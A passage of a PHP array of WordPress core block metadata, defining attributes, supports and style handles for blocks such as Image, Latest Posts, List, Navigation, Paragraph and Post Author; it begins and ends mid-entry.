        'source' => 'attribute',
        'selector' => 'figure > a',
        'attribute' => 'class'
      ),
      'id' => array(
        'type' => 'number',
        '__experimentalRole' => 'content'
      ),
      'width' => array(
        'type' => 'string'
      ),
      'height' => array(
        'type' => 'string'
      ),
      'aspectRatio' => array(
        'type' => 'string'
      ),
      'scale' => array(
        'type' => 'string'
      ),
      'sizeSlug' => array(
        'type' => 'string'
      ),
      'linkDestination' => array(
        'type' => 'string'
      ),
      'linkTarget' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'figure > a',
        'attribute' => 'target'
      )
    ),
    'supports' => array(
      'interactivity' => true,
      'align' => array(
        'left',
        'center',
        'right',
        'wide',
        'full'
      ),
      'anchor' => true,
      'color' => array(
        'text' => false,
        'background' => false
      ),
      'filter' => array(
        'duotone' => true
      ),
      '__experimentalBorder' => array(
        'color' => true,
        'radius' => true,
        'width' => true,
        '__experimentalSkipSerialization' => true,
        '__experimentalDefaultControls' => array(
          'color' => true,
          'radius' => true,
          'width' => true
        )
      ),
      'shadow' => array(
        '__experimentalSkipSerialization' => true
      )
    ),
    'selectors' => array(
      'border' => '.wp-block-image img, .wp-block-image .wp-block-image__crop-area, .wp-block-image .components-placeholder',
      'shadow' => '.wp-block-image img, .wp-block-image .wp-block-image__crop-area, .wp-block-image .components-placeholder',
      'filter' => array(
        'duotone' => '.wp-block-image img, .wp-block-image .components-placeholder'
      )
    ),
    'styles' => array(
      array(
        'name' => 'default',
        'label' => 'Default',
        'isDefault' => true
      ),
      array(
        'name' => 'rounded',
        'label' => 'Rounded'
      )
    ),
    'editorStyle' => 'wp-block-image-editor',
    'style' => 'wp-block-image'
  ),
  'latest-comments' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/latest-comments',
    'title' => 'Latest Comments',
    'category' => 'widgets',
    'description' => 'Display a list of your most recent comments.',
    'keywords' => array(
      'recent comments'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'commentsToShow' => array(
        'type' => 'number',
        'default' => 5,
        'minimum' => 1,
        'maximum' => 100
      ),
      'displayAvatar' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'displayDate' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'displayExcerpt' => array(
        'type' => 'boolean',
        'default' => true
      )
    ),
    'supports' => array(
      'align' => true,
      'html' => false,
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-latest-comments-editor',
    'style' => 'wp-block-latest-comments'
  ),
  'latest-posts' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/latest-posts',
    'title' => 'Latest Posts',
    'category' => 'widgets',
    'description' => 'Display a list of your most recent posts.',
    'keywords' => array(
      'recent posts'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'categories' => array(
        'type' => 'array',
        'items' => array(
          'type' => 'object'
        )
      ),
      'selectedAuthor' => array(
        'type' => 'number'
      ),
      'postsToShow' => array(
        'type' => 'number',
        'default' => 5
      ),
      'displayPostContent' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'displayPostContentRadio' => array(
        'type' => 'string',
        'default' => 'excerpt'
      ),
      'excerptLength' => array(
        'type' => 'number',
        'default' => 55
      ),
      'displayAuthor' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'displayPostDate' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'postLayout' => array(
        'type' => 'string',
        'default' => 'list'
      ),
      'columns' => array(
        'type' => 'number',
        'default' => 3
      ),
      'order' => array(
        'type' => 'string',
        'default' => 'desc'
      ),
      'orderBy' => array(
        'type' => 'string',
        'default' => 'date'
      ),
      'displayFeaturedImage' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'featuredImageAlign' => array(
        'type' => 'string',
        'enum' => array(
          'left',
          'center',
          'right'
        )
      ),
      'featuredImageSizeSlug' => array(
        'type' => 'string',
        'default' => 'thumbnail'
      ),
      'featuredImageSizeWidth' => array(
        'type' => 'number',
        'default' => null
      ),
      'featuredImageSizeHeight' => array(
        'type' => 'number',
        'default' => null
      ),
      'addLinkToFeaturedImage' => array(
        'type' => 'boolean',
        'default' => false
      )
    ),
    'supports' => array(
      'align' => true,
      'html' => false,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-latest-posts-editor',
    'style' => 'wp-block-latest-posts'
  ),
  'legacy-widget' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/legacy-widget',
    'title' => 'Legacy Widget',
    'category' => 'widgets',
    'description' => 'Display a legacy widget.',
    'textdomain' => 'default',
    'attributes' => array(
      'id' => array(
        'type' => 'string',
        'default' => null
      ),
      'idBase' => array(
        'type' => 'string',
        'default' => null
      ),
      'instance' => array(
        'type' => 'object',
        'default' => null
      )
    ),
    'supports' => array(
      'html' => false,
      'customClassName' => false,
      'reusable' => false
    ),
    'editorStyle' => 'wp-block-legacy-widget-editor'
  ),
  'list' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/list',
    'title' => 'List',
    'category' => 'text',
    'allowedBlocks' => array(
      'core/list-item'
    ),
    'description' => 'Create a bulleted or numbered list.',
    'keywords' => array(
      'bullet list',
      'ordered list',
      'numbered list'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'ordered' => array(
        'type' => 'boolean',
        'default' => false,
        '__experimentalRole' => 'content'
      ),
      'values' => array(
        'type' => 'string',
        'source' => 'html',
        'selector' => 'ol,ul',
        'multiline' => 'li',
        '__unstableMultilineWrapperTags' => array(
          'ol',
          'ul'
        ),
        'default' => '',
        '__experimentalRole' => 'content'
      ),
      'type' => array(
        'type' => 'string'
      ),
      'start' => array(
        'type' => 'number'
      ),
      'reversed' => array(
        'type' => 'boolean'
      ),
      'placeholder' => array(
        'type' => 'string'
      )
    ),
    'supports' => array(
      'anchor' => true,
      'html' => false,
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      '__unstablePasteTextInline' => true,
      '__experimentalOnMerge' => true,
      '__experimentalSlashInserter' => true,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-list-editor',
    'style' => 'wp-block-list'
  ),
  'list-item' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/list-item',
    'title' => 'List item',
    'category' => 'text',
    'parent' => array(
      'core/list'
    ),
    'allowedBlocks' => array(
      'core/list'
    ),
    'description' => 'Create a list item.',
    'textdomain' => 'default',
    'attributes' => array(
      'placeholder' => array(
        'type' => 'string'
      ),
      'content' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'li',
        '__experimentalRole' => 'content'
      )
    ),
    'supports' => array(
      'className' => false,
      '__experimentalSelector' => '.wp-block-list > li',
      'splitting' => true,
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'loginout' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/loginout',
    'title' => 'Login/out',
    'category' => 'theme',
    'description' => 'Show login & logout links.',
    'keywords' => array(
      'login',
      'logout',
      'form'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'displayLoginAsForm' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'redirectToCurrent' => array(
        'type' => 'boolean',
        'default' => true
      )
    ),
    'supports' => array(
      'className' => true,
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'media-text' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/media-text',
    'title' => 'Media & Text',
    'category' => 'media',
    'description' => 'Set media and words side-by-side for a richer layout.',
    'keywords' => array(
      'image',
      'video'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'align' => array(
        'type' => 'string',
        'default' => 'none'
      ),
      'mediaAlt' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'figure img',
        'attribute' => 'alt',
        'default' => '',
        '__experimentalRole' => 'content'
      ),
      'mediaPosition' => array(
        'type' => 'string',
        'default' => 'left'
      ),
      'mediaId' => array(
        'type' => 'number',
        '__experimentalRole' => 'content'
      ),
      'mediaUrl' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'figure video,figure img',
        'attribute' => 'src',
        '__experimentalRole' => 'content'
      ),
      'mediaLink' => array(
        'type' => 'string'
      ),
      'linkDestination' => array(
        'type' => 'string'
      ),
      'linkTarget' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'figure a',
        'attribute' => 'target'
      ),
      'href' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'figure a',
        'attribute' => 'href',
        '__experimentalRole' => 'content'
      ),
      'rel' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'figure a',
        'attribute' => 'rel'
      ),
      'linkClass' => array(
        'type' => 'string',
        'source' => 'attribute',
        'selector' => 'figure a',
        'attribute' => 'class'
      ),
      'mediaType' => array(
        'type' => 'string',
        '__experimentalRole' => 'content'
      ),
      'mediaWidth' => array(
        'type' => 'number',
        'default' => 50
      ),
      'mediaSizeSlug' => array(
        'type' => 'string'
      ),
      'isStackedOnMobile' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'verticalAlignment' => array(
        'type' => 'string'
      ),
      'imageFill' => array(
        'type' => 'boolean'
      ),
      'focalPoint' => array(
        'type' => 'object'
      ),
      'allowedBlocks' => array(
        'type' => 'array'
      ),
      'useFeaturedImage' => array(
        'type' => 'boolean',
        'default' => false
      )
    ),
    'usesContext' => array(
      'postId',
      'postType'
    ),
    'supports' => array(
      'anchor' => true,
      'align' => array(
        'wide',
        'full'
      ),
      'html' => false,
      'color' => array(
        'gradients' => true,
        'heading' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-media-text-editor',
    'style' => 'wp-block-media-text'
  ),
  'missing' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/missing',
    'title' => 'Unsupported',
    'category' => 'text',
    'description' => 'Your site doesn’t include support for this block.',
    'textdomain' => 'default',
    'attributes' => array(
      'originalName' => array(
        'type' => 'string'
      ),
      'originalUndelimitedContent' => array(
        'type' => 'string'
      ),
      'originalContent' => array(
        'type' => 'string',
        'source' => 'raw'
      )
    ),
    'supports' => array(
      'className' => false,
      'customClassName' => false,
      'inserter' => false,
      'html' => false,
      'reusable' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'more' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/more',
    'title' => 'More',
    'category' => 'design',
    'description' => 'Content before this block will be shown in the excerpt on your archives page.',
    'keywords' => array(
      'read more'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'customText' => array(
        'type' => 'string',
        'default' => ''
      ),
      'noTeaser' => array(
        'type' => 'boolean',
        'default' => false
      )
    ),
    'supports' => array(
      'customClassName' => false,
      'className' => false,
      'html' => false,
      'multiple' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-more-editor'
  ),
  'navigation' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/navigation',
    'title' => 'Navigation',
    'category' => 'theme',
    'allowedBlocks' => array(
      'core/navigation-link',
      'core/search',
      'core/social-links',
      'core/page-list',
      'core/spacer',
      'core/home-link',
      'core/site-title',
      'core/site-logo',
      'core/navigation-submenu',
      'core/loginout',
      'core/buttons'
    ),
    'description' => 'A collection of blocks that allow visitors to get around your site.',
    'keywords' => array(
      'menu',
      'navigation',
      'links'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'ref' => array(
        'type' => 'number'
      ),
      'textColor' => array(
        'type' => 'string'
      ),
      'customTextColor' => array(
        'type' => 'string'
      ),
      'rgbTextColor' => array(
        'type' => 'string'
      ),
      'backgroundColor' => array(
        'type' => 'string'
      ),
      'customBackgroundColor' => array(
        'type' => 'string'
      ),
      'rgbBackgroundColor' => array(
        'type' => 'string'
      ),
      'showSubmenuIcon' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'openSubmenusOnClick' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'overlayMenu' => array(
        'type' => 'string',
        'default' => 'mobile'
      ),
      'icon' => array(
        'type' => 'string',
        'default' => 'handle'
      ),
      'hasIcon' => array(
        'type' => 'boolean',
        'default' => true
      ),
      '__unstableLocation' => array(
        'type' => 'string'
      ),
      'overlayBackgroundColor' => array(
        'type' => 'string'
      ),
      'customOverlayBackgroundColor' => array(
        'type' => 'string'
      ),
      'overlayTextColor' => array(
        'type' => 'string'
      ),
      'customOverlayTextColor' => array(
        'type' => 'string'
      ),
      'maxNestingLevel' => array(
        'type' => 'number',
        'default' => 5
      ),
      'templateLock' => array(
        'type' => array(
          'string',
          'boolean'
        ),
        'enum' => array(
          'all',
          'insert',
          'contentOnly',
          false
        )
      )
    ),
    'providesContext' => array(
      'textColor' => 'textColor',
      'customTextColor' => 'customTextColor',
      'backgroundColor' => 'backgroundColor',
      'customBackgroundColor' => 'customBackgroundColor',
      'overlayTextColor' => 'overlayTextColor',
      'customOverlayTextColor' => 'customOverlayTextColor',
      'overlayBackgroundColor' => 'overlayBackgroundColor',
      'customOverlayBackgroundColor' => 'customOverlayBackgroundColor',
      'fontSize' => 'fontSize',
      'customFontSize' => 'customFontSize',
      'showSubmenuIcon' => 'showSubmenuIcon',
      'openSubmenusOnClick' => 'openSubmenusOnClick',
      'style' => 'style',
      'maxNestingLevel' => 'maxNestingLevel'
    ),
    'supports' => array(
      'align' => array(
        'wide',
        'full'
      ),
      'ariaLabel' => true,
      'html' => false,
      'inserter' => true,
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalFontWeight' => true,
        '__experimentalTextTransform' => true,
        '__experimentalFontFamily' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalSkipSerialization' => array(
          'textDecoration'
        ),
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'spacing' => array(
        'blockGap' => true,
        'units' => array(
          'px',
          'em',
          'rem',
          'vh',
          'vw'
        ),
        '__experimentalDefaultControls' => array(
          'blockGap' => true
        )
      ),
      'layout' => array(
        'allowSwitching' => false,
        'allowInheriting' => false,
        'allowVerticalAlignment' => false,
        'allowSizingOnChildren' => true,
        'default' => array(
          'type' => 'flex'
        )
      ),
      'interactivity' => true,
      'renaming' => false
    ),
    'editorStyle' => 'wp-block-navigation-editor',
    'style' => 'wp-block-navigation'
  ),
  'navigation-link' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/navigation-link',
    'title' => 'Custom Link',
    'category' => 'design',
    'parent' => array(
      'core/navigation'
    ),
    'allowedBlocks' => array(
      'core/navigation-link',
      'core/navigation-submenu',
      'core/page-list'
    ),
    'description' => 'Add a page, link, or another item to your navigation.',
    'textdomain' => 'default',
    'attributes' => array(
      'label' => array(
        'type' => 'string'
      ),
      'type' => array(
        'type' => 'string'
      ),
      'description' => array(
        'type' => 'string'
      ),
      'rel' => array(
        'type' => 'string'
      ),
      'id' => array(
        'type' => 'number'
      ),
      'opensInNewTab' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'url' => array(
        'type' => 'string'
      ),
      'title' => array(
        'type' => 'string'
      ),
      'kind' => array(
        'type' => 'string'
      ),
      'isTopLevelLink' => array(
        'type' => 'boolean'
      )
    ),
    'usesContext' => array(
      'textColor',
      'customTextColor',
      'backgroundColor',
      'customBackgroundColor',
      'overlayTextColor',
      'customOverlayTextColor',
      'overlayBackgroundColor',
      'customOverlayBackgroundColor',
      'fontSize',
      'customFontSize',
      'showSubmenuIcon',
      'maxNestingLevel',
      'style'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      '__experimentalSlashInserter' => true,
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'renaming' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-navigation-link-editor',
    'style' => 'wp-block-navigation-link'
  ),
  'navigation-submenu' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/navigation-submenu',
    'title' => 'Submenu',
    'category' => 'design',
    'parent' => array(
      'core/navigation'
    ),
    'description' => 'Add a submenu to your navigation.',
    'textdomain' => 'default',
    'attributes' => array(
      'label' => array(
        'type' => 'string'
      ),
      'type' => array(
        'type' => 'string'
      ),
      'description' => array(
        'type' => 'string'
      ),
      'rel' => array(
        'type' => 'string'
      ),
      'id' => array(
        'type' => 'number'
      ),
      'opensInNewTab' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'url' => array(
        'type' => 'string'
      ),
      'title' => array(
        'type' => 'string'
      ),
      'kind' => array(
        'type' => 'string'
      ),
      'isTopLevelItem' => array(
        'type' => 'boolean'
      )
    ),
    'usesContext' => array(
      'textColor',
      'customTextColor',
      'backgroundColor',
      'customBackgroundColor',
      'overlayTextColor',
      'customOverlayTextColor',
      'overlayBackgroundColor',
      'customOverlayBackgroundColor',
      'fontSize',
      'customFontSize',
      'showSubmenuIcon',
      'maxNestingLevel',
      'openSubmenusOnClick',
      'style'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-navigation-submenu-editor',
    'style' => 'wp-block-navigation-submenu'
  ),
  'nextpage' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/nextpage',
    'title' => 'Page Break',
    'category' => 'design',
    'description' => 'Separate your content into a multi-page experience.',
    'keywords' => array(
      'next page',
      'pagination'
    ),
    'parent' => array(
      'core/post-content'
    ),
    'textdomain' => 'default',
    'supports' => array(
      'customClassName' => false,
      'className' => false,
      'html' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-nextpage-editor'
  ),
  'page-list' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/page-list',
    'title' => 'Page List',
    'category' => 'widgets',
    'allowedBlocks' => array(
      'core/page-list-item'
    ),
    'description' => 'Display a list of all pages.',
    'keywords' => array(
      'menu',
      'navigation'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'parentPageID' => array(
        'type' => 'integer',
        'default' => 0
      ),
      'isNested' => array(
        'type' => 'boolean',
        'default' => false
      )
    ),
    'usesContext' => array(
      'textColor',
      'customTextColor',
      'backgroundColor',
      'customBackgroundColor',
      'overlayTextColor',
      'customOverlayTextColor',
      'overlayBackgroundColor',
      'customOverlayBackgroundColor',
      'fontSize',
      'customFontSize',
      'showSubmenuIcon',
      'style',
      'openSubmenusOnClick'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-page-list-editor',
    'style' => 'wp-block-page-list'
  ),
  'page-list-item' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/page-list-item',
    'title' => 'Page List Item',
    'category' => 'widgets',
    'parent' => array(
      'core/page-list'
    ),
    'description' => 'Displays a page inside a list of all pages.',
    'keywords' => array(
      'page',
      'menu',
      'navigation'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'id' => array(
        'type' => 'number'
      ),
      'label' => array(
        'type' => 'string'
      ),
      'title' => array(
        'type' => 'string'
      ),
      'link' => array(
        'type' => 'string'
      ),
      'hasChildren' => array(
        'type' => 'boolean'
      )
    ),
    'usesContext' => array(
      'textColor',
      'customTextColor',
      'backgroundColor',
      'customBackgroundColor',
      'overlayTextColor',
      'customOverlayTextColor',
      'overlayBackgroundColor',
      'customOverlayBackgroundColor',
      'fontSize',
      'customFontSize',
      'showSubmenuIcon',
      'style',
      'openSubmenusOnClick'
    ),
    'supports' => array(
      'reusable' => false,
      'html' => false,
      'lock' => false,
      'inserter' => false,
      '__experimentalToolbar' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-page-list-editor',
    'style' => 'wp-block-page-list'
  ),
  'paragraph' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/paragraph',
    'title' => 'Paragraph',
    'category' => 'text',
    'description' => 'Start with the basic building block of all narrative.',
    'keywords' => array(
      'text'
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'align' => array(
        'type' => 'string'
      ),
      'content' => array(
        'type' => 'rich-text',
        'source' => 'rich-text',
        'selector' => 'p',
        '__experimentalRole' => 'content'
      ),
      'dropCap' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'placeholder' => array(
        'type' => 'string'
      ),
      'direction' => array(
        'type' => 'string',
        'enum' => array(
          'ltr',
          'rtl'
        )
      )
    ),
    'supports' => array(
      'splitting' => true,
      'anchor' => true,
      'className' => false,
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'spacing' => array(
        'margin' => true,
        'padding' => true,
        '__experimentalDefaultControls' => array(
          'margin' => false,
          'padding' => false
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalFontStyle' => true,
        '__experimentalFontWeight' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalTextTransform' => true,
        '__experimentalWritingMode' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      '__experimentalSelector' => 'p',
      '__unstablePasteTextInline' => true,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'editorStyle' => 'wp-block-paragraph-editor',
    'style' => 'wp-block-paragraph'
  ),
  'pattern' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/pattern',
    'title' => 'Pattern placeholder',
    'category' => 'theme',
    'description' => 'Show a block pattern.',
    'supports' => array(
      'html' => false,
      'inserter' => false,
      'renaming' => false,
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'textdomain' => 'default',
    'attributes' => array(
      'slug' => array(
        'type' => 'string'
      )
    )
  ),
  'post-author' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-author',
    'title' => 'Author',
    'category' => 'theme',
    'description' => 'Display post author details such as name, avatar, and bio.',
    'textdomain' => 'default',
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      ),
      'avatarSize' => array(
        'type' => 'number',
        'default' => 48
      ),
      'showAvatar' => array(
        'type' => 'boolean',
        'default' => true
      ),
      'showBio' => array(
        'type' => 'boolean'
      ),
      'byline' => array(
        'type' => 'string'
      ),
      'isLink' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'linkTarget' => array(
        'type' => 'string',
        'default' => '_self'
      )
    ),
    'usesContext' => array(
      'postType',
      'postId',
      'queryId'
    ),
    'supports' => array(
      'html' => false,
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDuotone' => '.wp-block-post-author__avatar img',
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    ),
    'style' => 'wp-block-post-author'
  ),
  'post-author-biography' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-author-biography',
    'title' => 'Author Biography',
    'category' => 'theme',
    'description' => 'The author biography.',
    'textdomain' => 'default',
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      )
    ),
    'usesContext' => array(
      'postType',
      'postId'
    ),
    'supports' => array(
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
          'fontSize' => true
        )
      ),
      'interactivity' => array(
        'clientNavigation' => true
      )
    )
  ),
  'post-author-name' => array(
    '$schema' => 'https://schemas.wp.org/trunk/block.json',
    'apiVersion' => 3,
    'name' => 'core/post-author-name',
    'title' => 'Author Name',
    'category' => 'theme',
    'description' => 'The author name.',
    'textdomain' => 'default',
    'attributes' => array(
      'textAlign' => array(
        'type' => 'string'
      ),
      'isLink' => array(
        'type' => 'boolean',
        'default' => false
      ),
      'linkTarget' => array(
        'type' => 'string',
        'default' => '_self'
      )
    ),
    'usesContext' => array(
      'postType',
      'postId'
    ),
    'supports' => array(
      'html' => false,
      'spacing' => array(
        'margin' => true,
        'padding' => true
      ),
      'color' => array(
        'gradients' => true,
        'link' => true,
        '__experimentalDefaultControls' => array(
          'background' => true,
          'text' => true,
          'link' => true
        )
      ),
      'typography' => array(
        'fontSize' => true,
        'lineHeight' => true,
        '__experimentalFontFamily' => true,
        '__experimentalFontWeight' => true,
        '__experimentalFontStyle' => true,
        '__experimentalTextTransform' => true,
        '__experimentalTextDecoration' => true,
        '__experimentalLetterSpacing' => true,
        '__experimentalDefaultControls' => array(
